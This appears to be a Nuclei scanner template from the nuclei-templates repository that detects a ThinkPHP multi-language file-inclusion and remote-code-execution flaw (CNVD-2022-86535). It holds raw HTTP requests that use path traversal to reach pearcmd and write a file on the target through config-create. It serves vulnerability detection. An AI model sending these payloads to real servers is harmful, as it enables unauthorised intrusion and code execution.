nuclei-templates/http/cnvd/2022/CNVD-2022-86535.yaml

46 lines
1.3 KiB
YAML

id: CNVD-2022-86535
info:
name: ThinkPHP Multi Languag - File Inc & Remote Code Execution (RCE)
author: arliya,ritikchaddha
severity: high
description: |
ThinkPHP has a command execution vulnerability because the multi-language function is enabled and the parameter passing of parameter lang is not strictly filtered. Attackers can use this vulnerability to execute commands.
reference:
- https://cn-sec.com/archives/1465289.html
- https://blog.csdn.net/qq_60614981/article/details/128724640
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-86535
metadata:
max-request: 3
verified: true
tags: cnvd,cnvd2022,thinkphp,rce
http:
- raw:
- |
GET /?lang=../../../../../usr/local/php/pearcmd HTTP/1.1
Host: {{Hostname}}
- |
GET / HTTP/1.1
Host: {{Hostname}}
think-lang: ../../../../../usr/local/php/pearcmd
- |
GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+{{rand_base(10)}}.log HTTP/1.1
Host: {{Hostname}}
matchers-condition: or
matchers:
- type: word
part: set_cookie
words:
- "think_lang=..%2F..%2F..%2F..%2F"
- type: word
part: body_3
words:
- "CONFIGURATION"
- "Successfully created"
condition: and